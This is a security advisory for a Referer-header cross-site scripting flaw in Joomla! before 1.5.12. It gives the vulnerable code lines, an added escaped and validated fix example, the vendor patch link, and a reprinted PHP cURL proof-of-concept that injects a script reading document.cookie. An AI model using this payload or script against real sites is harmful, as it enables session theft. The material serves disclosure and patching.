Affected systems:
Open Source Matters Joomla! < 1.5.12
Unaffected systems:
Open Source Matters Joomla! 1.5.12
Description:
BUGTRAQ ID: 35544
Joomla! is an open-source content management system (CMS).
Joomla! does not properly filter the HTTP_REFERER variable that a user submits in an HTTP request. A remote attacker can send a crafted request to inject JavaScript or DHTML code that is then executed in the user's browser session. The vulnerable code segment is:
components/com_content/views/article/tmpl/form.php, line 225
221 <input type="hidden" name="option" value="com_content" />
222 <input type="hidden" name="id" value="<?php echo $this->article->id; ?>" />
223 <input type="hidden" name="version" value="<?php echo $this->article->version; ?>" />
224 <input type="hidden" name="created_by" value="<?php echo $this->article->created_by; ?>" />
225 <input type="hidden" name="referer" value="<?php echo @$_SERVER['HTTP_REFERER']; ?>" />
226 <?php echo JHTML::_( 'form.token' ); ?>
227 <input type="hidden" name="task" value="" />
228 </form>
Other parts of the code may also be affected:
components/com_user/controller.php, line 86
$return = @$_SERVER['HTTP_REFERER'];
plugins/system/legacy/html.php, line 246
echo '<a href="'. $_SERVER['HTTP_REFERER'] .'"><span class="small">'. JText::_( 'BACK' ) .'</span></a>';
templates/beez/html/com_content/article/form.php, line 186
<input type="hidden" name="referer" value="<?php echo @$_SERVER['HTTP_REFERER']; ?>" />
<* Source: Juan Galiana Lara (jgaliana@isecauditors.com)
Link: http://marc.info/?l=bugtraq&m=124655389716111&w=2
*>
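The four locations above share one defect: a request header lands inside HTML output without escaping for the context it is written into. The following is an added example, not Joomla's own code or its 1.5.12 fix, that places the unescaped field from form.php line 225 beside two hardened variants so the difference can be checked locally. The function names, the expected-host policy in the validated variant, and the crafted Referer value are all constructed for the demonstration.

```php
<?php
// Added example (not Joomla project code). Shows the vulnerable referer field
// from form.php line 225 beside an escaped and a validated version.

/**
 * Mirrors the vulnerable line: the raw header is written into a double-quoted
 * attribute, so a '"' in the header closes the attribute and whatever follows
 * is parsed as markup by the browser.
 */
function refererFieldVulnerable(array $server): string
{
    $referer = isset($server['HTTP_REFERER']) ? $server['HTTP_REFERER'] : '';
    return '<input type="hidden" name="referer" value="' . $referer . '" />';
}

/**
 * Hardened: escape for the HTML attribute context. ENT_QUOTES matters here
 * because the value sits inside a quoted attribute; escaping '<' alone would
 * still let a '"' break out of it.
 */
function refererFieldEscaped(array $server): string
{
    $referer = isset($server['HTTP_REFERER']) ? $server['HTTP_REFERER'] : '';
    $safe = htmlspecialchars($referer, ENT_QUOTES, 'UTF-8');
    return '<input type="hidden" name="referer" value="' . $safe . '" />';
}

/**
 * Stricter: the field only ever needs to hold a URL on this site, so accept
 * only an http(s) URL whose host matches $expectedHost and emit an empty value
 * otherwise. (Policy assumed for this example; Joomla's own fix may differ.)
 */
function refererFieldValidated(array $server, string $expectedHost): string
{
    $referer = isset($server['HTTP_REFERER']) ? $server['HTTP_REFERER'] : '';
    $parts = parse_url($referer);
    $ok = is_array($parts)
        && isset($parts['scheme'], $parts['host'])
        && in_array($parts['scheme'], ['http', 'https'], true)
        && strcasecmp($parts['host'], $expectedHost) === 0;
    $safe = $ok ? htmlspecialchars($referer, ENT_QUOTES, 'UTF-8') : '';
    return '<input type="hidden" name="referer" value="' . $safe . '" />';
}

/**
 * Self-check used below: the rendered field must contain exactly one '<',
 * the input tag itself. Any second '<' means injected markup survived.
 */
function containsInjectedMarkup(string $html): bool
{
    return substr_count($html, '<') !== 1;
}

// Constructed request: a Referer header that carries markup instead of a URL,
// the same shape as the PoC on this page.
$server = ['HTTP_REFERER' => '"><script>alert(1)</script><span a="'];

foreach ([
    'vulnerable' => refererFieldVulnerable($server),
    'escaped'    => refererFieldEscaped($server),
    'validated'  => refererFieldValidated($server, 'localhost'),
] as $label => $html) {
    printf("%-10s injected=%s  %s\n",
        $label, containsInjectedMarkup($html) ? 'yes' : 'no', $html);
}
```

Run with `php example.php`: the vulnerable line reports `injected=yes` and the two hardened lines `injected=no`. The escaped variant is the minimal fix; the validated variant is what a reviewer would ask for when the value is only ever consumed as a redirect target, since it also removes off-site URLs from the field.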
Test method:
<?php
/* PoC: XSS Joomla 1.5.11
Juan Galiana Lara
Internet Security Auditors
Jun 2009
*/
/* config: target site and the Joomla session cookie to send with the request */
$site='localhost';
$path='/joomla-1.5.11';
$cookname='d85558a8cf943386aaa374896bfd3d99';
$cookvalue='4ab56fdd83bcad86289726aead602699';
class cURL {
    var $headers;
    var $user_agent;
    var $compression;
    var $cookie_file;
    var $proxy;
    var $cookies;
    /* evil script */
    var $xss='alert("PWN PWN PWN: " + document.cookie);';
    function cURL($cookies=TRUE,$cookie='cookies.txt',$compression='gzip',$proxy='') {
        $this->headers[] = 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8';
        $this->headers[] = 'Connection: Keep-Alive';
        $this->headers[] = 'Content-type: application/x-www-form-urlencoded;charset=UTF-8';
        /* the payload travels in the Referer header, which form.php echoes unescaped */
        $this->headers[] = 'Referer: "><script>' . $this->xss .'</script><span a="';
        $this->user_agent = 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)';
        $this->compression=$compression;
        $this->proxy=$proxy;
        $this->cookies=$cookies;
        if ($this->cookies == TRUE) $this->cookie($cookie);
    }
    function cookie($cookie_file) {
        if (file_exists($cookie_file)) {
            $this->cookie_file=$cookie_file;
        } else {
            /* create an empty cookie jar; close the handle, not the file name */
            $fh = fopen($cookie_file,'w') or $this->error('The cookie file could not be opened. Check permissions');
            $this->cookie_file=$cookie_file;
            fclose($fh);
        }
    }
    function get($url) {
        $process = curl_init($url);
        curl_setopt($process, CURLOPT_HTTPHEADER, $this->headers);
        curl_setopt($process, CURLOPT_HEADER, 0);
        curl_setopt($process, CURLOPT_USERAGENT, $this->user_agent);
        if ($this->cookies == TRUE) curl_setopt($process, CURLOPT_COOKIEFILE, $this->cookie_file);
        if ($this->cookies == TRUE) curl_setopt($process, CURLOPT_COOKIEJAR, $this->cookie_file);
        curl_setopt($process, CURLOPT_ENCODING, $this->compression);
        curl_setopt($process, CURLOPT_TIMEOUT, 30);
        /* proxy is the configured "host:port" string, applied to the same handle */
        if ($this->proxy) curl_setopt($process, CURLOPT_PROXY, $this->proxy);
        curl_setopt($process, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($process, CURLOPT_FOLLOWLOCATION, 1);
        $return = curl_exec($process);
        curl_close($process);
        return $return;
    }
    function error($error) {
        echo $error;
        die;
    }
}
/* set cookie (Netscape cookie-jar format, one tab-separated line) */
$f=fopen("cookies.txt","w");
fwrite($f,"localhost\tFALSE\t/\tFALSE\t0\t$cookname\t$cookvalue\n");
fclose($f);
/* do request */
$cc = new cURL();
$c=$cc->get('http://' . $site . $path . '/index.php?option=com_content&view=article&layout=form');
/* let's execute some javascript.. }:-)*/
echo $c;
?>
Recommendations:
Vendor patch:
Open Source Matters
-------------------
The vendor has released an upgrade that fixes this security issue. Download it from the vendor's site:
http://www.joomla.org/announcements/release-news/5242-joomla-1512-released.html
Warning
The program (method) above may be offensive in nature and is provided for security research and teaching only. Users bear the risk themselves!